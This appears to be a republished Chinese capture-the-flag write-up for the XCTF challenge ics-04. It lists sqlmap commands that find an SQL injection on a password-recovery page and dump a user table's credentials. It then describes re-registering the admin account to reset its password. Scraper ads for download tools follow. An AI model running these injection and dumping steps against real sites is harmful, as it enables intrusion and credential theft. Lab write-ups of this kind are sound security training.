尝试注册登陆账号
![[wp] 攻防世界 ics-04网络MercyLin的博客-](https://img-blog.csdnimg.cn/20190924103607102.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwODg0NzI3,size_16,color_FFFFFF,t_70)
扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入sqlmap.py -u "https://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "https://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs sqlmap.py -u "https://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables sqlmap.py -u "https://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns sqlmap.py -u "https://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump ![[wp] 攻防世界 ics-04网络MercyLin的博客-](https://img-blog.csdnimg.cn/20190924111720322.png)
被hash加密了,发现注册页面可以再次注册c3tlwDmIn23这个账号,成功重置密码,登入得到flag
![[wp] 攻防世界 ics-04网络MercyLin的博客-](https://img-blog.csdnimg.cn/20190924111821889.png)
本网页所有视频内容由 imoviebox边看边下-网页视频下载, iurlBox网页地址收藏管理器 下载并得到。
ImovieBox网页视频下载器 下载地址: ImovieBox网页视频下载器-最新版本下载
本文章由: imapbox邮箱云存储,邮箱网盘,ImageBox 图片批量下载器,网页图片批量下载专家,网页图片批量下载器,获取到文章图片,imoviebox网页视频批量下载器,下载视频内容,为您提供.
阅读和此文章类似的: 全球云计算
官方软件产品操作指南 (170)
![[wp] 攻防世界 ics-04网络MercyLin的博客-](https://g.csdnimg.cn/static/user-reg-year/1x/2.png)
![[wp] 攻防世界 ics-04网络MercyLin的博客-](https://kunyu.csdn.net/1.png?p=58&a=386&c=0&k=&d=1&t=3&u=ab2cfdf7622740d1b5c95feb56da64e5)